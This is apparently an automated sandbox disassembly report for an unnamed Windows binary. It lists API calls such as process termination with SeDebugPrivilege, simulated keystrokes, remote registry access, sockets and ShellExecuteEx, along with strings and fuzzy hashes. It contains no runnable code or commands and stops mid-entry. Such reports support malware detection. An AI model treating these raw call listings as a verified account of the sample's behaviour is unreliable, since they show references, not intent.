                                                                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00DEE9A0,00000004,00000000,00000000), ref: 00D8F737
                                                                                                                  • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,00DEE9A0,00000004,00000000,00000000), ref: 00D8F77E
                                                                                                                  • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,00DEE9A0,00000004,00000000,00000000), ref: 00DEEB55
                                                                                                                  • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,00DEE9A0,00000004,00000000,00000000), ref: 00DEEBC1
                                                                                                                  Similarity
                                                                                                                  • API ID: ShowWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1268545403-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DAE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DAE158
                                                                                                                    • Part of subcall function 00DAE138: GetCurrentThreadId.KERNEL32 ref: 00DAE15F
                                                                                                                    • Part of subcall function 00DAE138: AttachThreadInput.USER32(00000000,?,00DACDFB,?,00000001), ref: 00DAE166
                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DACE06
                                                                                                                  • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00DACE23
                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00DACE26
                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DACE2F
                                                                                                                  • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00DACE4D
                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00DACE50
                                                                                                                  • MapVirtualKeyW.USER32(00000025,00000000), ref: 00DACE59
                                                                                                                  • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00DACE70
                                                                                                                  • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00DACE73
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2014098862-0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DAA857: CLSIDFromProgID.COMBASE ref: 00DAA874
                                                                                                                    • Part of subcall function 00DAA857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 00DAA88F
                                                                                                                    • Part of subcall function 00DAA857: lstrcmpiW.KERNEL32(?,00000000), ref: 00DAA89D
                                                                                                                    • Part of subcall function 00DAA857: CoTaskMemFree.COMBASE(00000000), ref: 00DAA8AD
                                                                                                                  • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 00DCC6AD
                                                                                                                  • _memset.LIBCMT ref: 00DCC6BA
                                                                                                                  • _memset.LIBCMT ref: 00DCC7D8
                                                                                                                  • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 00DCC804
                                                                                                                  • CoTaskMemFree.COMBASE(?), ref: 00DCC80F
                                                                                                                  Strings
                                                                                                                  • NULL Pointer assignment, xrefs: 00DCC85D
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                  • String ID: NULL Pointer assignment
                                                                                                                  • API String ID: 1300414916-2785691316
                                                                                                                  APIs
                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00DD1B09
                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00DD1B17
                                                                                                                  • __wsplitpath.LIBCMT ref: 00DD1B45
                                                                                                                    • Part of subcall function 00D9297D: __wsplitpath_helper.LIBCMT ref: 00D929BD
                                                                                                                  • _wcscat.LIBCMT ref: 00DD1B5A
                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00DD1BD0
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00DD1BE2
                                                                                                                  Similarity
                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                  • String ID: hE
                                                                                                                  • API String ID: 1380811348-3080292677
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00DD9926
                                                                                                                  • SendMessageW.USER32(?,00001036,00000000,?), ref: 00DD993A
                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00DD9954
                                                                                                                  • _wcscat.LIBCMT ref: 00DD99AF
                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,?), ref: 00DD99C6
                                                                                                                  • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00DD99F4
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Window_wcscat
                                                                                                                  • String ID: SysListView32
                                                                                                                  • API String ID: 307300125-78025650
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DB6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00DB6F7D
                                                                                                                    • Part of subcall function 00DB6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00DB6F8D
                                                                                                                    • Part of subcall function 00DB6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 00DB7022
                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DD168B
                                                                                                                  • GetLastError.KERNEL32 ref: 00DD169E
                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00DD16CA
                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00DD1746
                                                                                                                  • GetLastError.KERNEL32(00000000), ref: 00DD1751
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00DD1786
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                  • String ID: SeDebugPrivilege
                                                                                                                  • API String ID: 2533919879-2896544425
                                                                                                                  APIs
                                                                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 00DB62D6
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: IconLoad
                                                                                                                  • String ID: blank$info$question$stop$warning
                                                                                                                  • API String ID: 2457776203-404129466
                                                                                                                  APIs
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 00DB7595
                                                                                                                  • LoadStringW.USER32(00000000), ref: 00DB759C
                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00DB75B2
                                                                                                                  • LoadStringW.USER32(00000000), ref: 00DB75B9
                                                                                                                  • _wprintf.LIBCMT ref: 00DB75DF
                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DB75FD
                                                                                                                  Strings
                                                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00DB75DA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                  • API String ID: 3648134473-3128320259
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D7CAEE: _memmove.LIBCMT ref: 00D7CB2F
                                                                                                                    • Part of subcall function 00DD3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DD2AA6,?,?), ref: 00DD3B0E
                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DD2AE7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: BuffCharConnectRegistryUpper_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3479070676-0
                                                                                                                  APIs
                                                                                                                  • select.WS2_32 ref: 00DC9B38
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00DC9B45
                                                                                                                  • __WSAFDIsSet.WS2_32(00000000,?), ref: 00DC9B6F
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00DC9B9F
                                                                                                                  • htons.WS2_32(?), ref: 00DC9C51
                                                                                                                  • inet_ntoa.WS2_32(?), ref: 00DC9C0C
                                                                                                                    • Part of subcall function 00DAE0F5: _strlen.LIBCMT ref: 00DAE0FF
                                                                                                                    • Part of subcall function 00DAE0F5: _memmove.LIBCMT ref: 00DAE121
                                                                                                                  • _strlen.LIBCMT ref: 00DC9CA7
                                                                                                                  • _memmove.LIBCMT ref: 00DC9D10
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLast_memmove_strlen$htonsinet_ntoaselect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3637404534-0
                                                                                                                  APIs
                                                                                                                  • __mtinitlocknum.LIBCMT ref: 00D9B744
                                                                                                                    • Part of subcall function 00D98A0C: __FF_MSGBANNER.LIBCMT ref: 00D98A21
                                                                                                                    • Part of subcall function 00D98A0C: __NMSG_WRITE.LIBCMT ref: 00D98A28
                                                                                                                    • Part of subcall function 00D98A0C: __malloc_crt.LIBCMT ref: 00D98A48
                                                                                                                  • __lock.LIBCMT ref: 00D9B757
                                                                                                                  • __lock.LIBCMT ref: 00D9B7A3
                                                                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00E26948,00000018,00DA6C2B,?,00000000,00000109), ref: 00D9B7BF
                                                                                                                  • RtlEnterCriticalSection.NTDLL(8000000C), ref: 00D9B7DC
                                                                                                                  • RtlLeaveCriticalSection.NTDLL(8000000C), ref: 00D9B7EC
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1422805418-0
                                                                                                                  APIs
                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00DBA1CE
                                                                                                                    • Part of subcall function 00D9010A: std::exception::exception.LIBCMT ref: 00D9013E
                                                                                                                    • Part of subcall function 00D9010A: __CxxThrowException@8.LIBCMT ref: 00D90153
                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00DBA205
                                                                                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 00DBA221
                                                                                                                  • _memmove.LIBCMT ref: 00DBA26F
                                                                                                                  • _memmove.LIBCMT ref: 00DBA28C
                                                                                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 00DBA29B
                                                                                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00DBA2B0
                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00DBA2CF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 256516436-0
                                                                                                                  • Opcode ID: 803dea8b36ecce52ae94b723f8f2523c217f7a11679cefc6714f50ef5e18ef95
                                                                                                                  • Instruction ID: ced792ce3bd4ebe1c5b8497455aa4eeeb379f71732e46accee4a782753a98e14
                                                                                                                  • Opcode Fuzzy Hash: 803dea8b36ecce52ae94b723f8f2523c217f7a11679cefc6714f50ef5e18ef95
                                                                                                                  • Instruction Fuzzy Hash: 1E318331900205EFCF00EF99DC85AAEBBB9EF45710B148065F905EB256D770D915CBB5
                                                                                                                  APIs
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00DD8CF3
                                                                                                                  • GetDC.USER32(00000000), ref: 00DD8CFB
                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DD8D06
                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00DD8D12
                                                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00DD8D4E
                                                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00DD8D5F
                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00DDBB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00DD8D99
                                                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00DD8DB9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3864802216-0
                                                                                                                  • Opcode ID: 4387d0b119d2b58573a7cc6f9b66f3b481c195e1594e7b75888426c28b2695f7
                                                                                                                  • Instruction ID: 9b65f048260b09b50a7b1a2faae62b740b4d04ad2fceb08328c98389170d342c
                                                                                                                  • Opcode Fuzzy Hash: 4387d0b119d2b58573a7cc6f9b66f3b481c195e1594e7b75888426c28b2695f7
                                                                                                                  • Instruction Fuzzy Hash: 9D317C72201214BFEB118F50CC8AFFA3BAEEF4A755F088055FE08DA291CA759841CB70
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00D784A6: __swprintf.LIBCMT ref: 00D784E5
                                                                                                                    • Part of subcall function 00D784A6: __itow.LIBCMT ref: 00D78519
                                                                                                                    • Part of subcall function 00D73BCF: _wcscpy.LIBCMT ref: 00D73BF2
                                                                                                                  • _wcstok.LIBCMT ref: 00DC1D6E
                                                                                                                  • _wcscpy.LIBCMT ref: 00DC1DFD
                                                                                                                  • _memset.LIBCMT ref: 00DC1E30
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                  • String ID: X$t:
                                                                                                                  • API String ID: 774024439-4137454495
                                                                                                                  • Opcode ID: 5f7ef2f6cb080758c91b24183cedb203040040d5341a6bed9e85a0b47315e6cb
                                                                                                                  • Instruction ID: 91f7c8bcb95c8aba27e322895577e85429a5a7fdcc88dd3430f9e51b2d7b0148
                                                                                                                  • Opcode Fuzzy Hash: 5f7ef2f6cb080758c91b24183cedb203040040d5341a6bed9e85a0b47315e6cb
                                                                                                                  • Instruction Fuzzy Hash: FDC14D355083119FC724EF24C895E5AB7E4EF85310F14892DF99A972A2EB70ED05CBB2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 50ab54ec158de37b2c9b0ab3e8c2207d46fa95481073e495993fb912f8657e67
                                                                                                                  • Instruction ID: 356e3db60e8a5140d2bd261abe28a054c098856cba5d0422a795389ac5b66ea2
                                                                                                                  • Opcode Fuzzy Hash: 50ab54ec158de37b2c9b0ab3e8c2207d46fa95481073e495993fb912f8657e67
                                                                                                                  • Instruction Fuzzy Hash: BA715A71900609EFCB04EF99CC89ABEBF75FF85324F24815AF955AA251C7309A42CB70
                                                                                                                  APIs
                                                                                                                  • _memset.LIBCMT ref: 00DD214B
                                                                                                                  • _memset.LIBCMT ref: 00DD2214
                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00DD2259
                                                                                                                    • Part of subcall function 00D784A6: __swprintf.LIBCMT ref: 00D784E5
                                                                                                                    • Part of subcall function 00D784A6: __itow.LIBCMT ref: 00D78519
                                                                                                                    • Part of subcall function 00D73BCF: _wcscpy.LIBCMT ref: 00D73BF2
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00DD2320
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00DD232F
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 4082843840-2766056989
                                                                                                                  • Opcode ID: adbd08ed001671607ea97a8ddbb788535277d8e7e73589755eb7fd619abe3da8
                                                                                                                  • Instruction ID: 86bc03d1a535f28e560431c357f8fc4e0d1b97e093788c9797e8e2571e9671d1
                                                                                                                  • Opcode Fuzzy Hash: adbd08ed001671607ea97a8ddbb788535277d8e7e73589755eb7fd619abe3da8
                                                                                                                  • Instruction Fuzzy Hash: DA716C75A00619DFCF04EFA4C9859AEBBF5FF48310B14805AE859AB351DB30AE40CBB0
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32(?), ref: 00DB481D
                                                                                                                  • GetKeyboardState.USER32(?), ref: 00DB4832
                                                                                                                  • SetKeyboardState.USER32(?), ref: 00DB4893
                                                                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00DB48C1
                                                                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00DB48E0
                                                                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00DB4926
                                                                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00DB4949
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 87235514-0
                                                                                                                  • Opcode ID: 16a29868abbfe49ead0785accee6d8cc59e79a1a3ea8e6b217fb2cff7c0f5000
                                                                                                                  • Instruction ID: 12bf246f57e4a92458b7b1dd4430914da6365e6483aba74706cba07b9684f0b9
                                                                                                                  • Opcode Fuzzy Hash: 16a29868abbfe49ead0785accee6d8cc59e79a1a3ea8e6b217fb2cff7c0f5000
                                                                                                                  • Instruction Fuzzy Hash: 1F51B0A06087D5BDFF3686248845BFBBEA95F06304F0C858DE1D6969C3C6D8E884DB71
                                                                                                                  APIs
                                                                                                                  • GetParent.USER32(00000000), ref: 00DB4638
                                                                                                                  • GetKeyboardState.USER32(?), ref: 00DB464D
                                                                                                                  • SetKeyboardState.USER32(?), ref: 00DB46AE
                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00DB46DA
                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00DB46F7
                                                                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00DB473B
                                                                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00DB475C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 87235514-0
                                                                                                                  • Opcode ID: 94c14829f5ba3c73cd92c8185e69058082f272c54316f27157f629682f11d0bb
                                                                                                                  • Instruction ID: dee8bf928a978a84591aee9e06e317bb7e3eab5232dfefbb6310a6cd2d467fd2
                                                                                                                  • Opcode Fuzzy Hash: 94c14829f5ba3c73cd92c8185e69058082f272c54316f27157f629682f11d0bb
                                                                                                                  • Instruction Fuzzy Hash: 3451A2A05047D5B9FB36C7248C55BFABFA99B06304F0C8489E1D686883D794EC98D771
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsncpy$LocalTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2945705084-0
                                                                                                                  • Opcode ID: 1ec4d83b740c6cb13e0f252c9e44671fe66f49c32ae46773699d4ac443a3ab38
                                                                                                                  • Instruction ID: f464ec68121e78e176a36a613e6928657577919a9173d5888f1543c22140469f
                                                                                                                  • Opcode Fuzzy Hash: 1ec4d83b740c6cb13e0f252c9e44671fe66f49c32ae46773699d4ac443a3ab38
                                                                                                                  • Instruction Fuzzy Hash: 5D414D69D10214B6CF11EBB8C886ADEB7ACEF05310F508866E555F3222EA30E655C7F5
                                                                                                                  APIs
                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00DD3C92
                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DD3CBC
                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00DD3D71
                                                                                                                    • Part of subcall function 00DD3C63: RegCloseKey.ADVAPI32(?), ref: 00DD3CD9
                                                                                                                    • Part of subcall function 00DD3C63: FreeLibrary.KERNEL32(?), ref: 00DD3D2B
                                                                                                                    • Part of subcall function 00DD3C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00DD3D4E
                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DD3D16
                                                                                                                  Similarity
                                                                                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
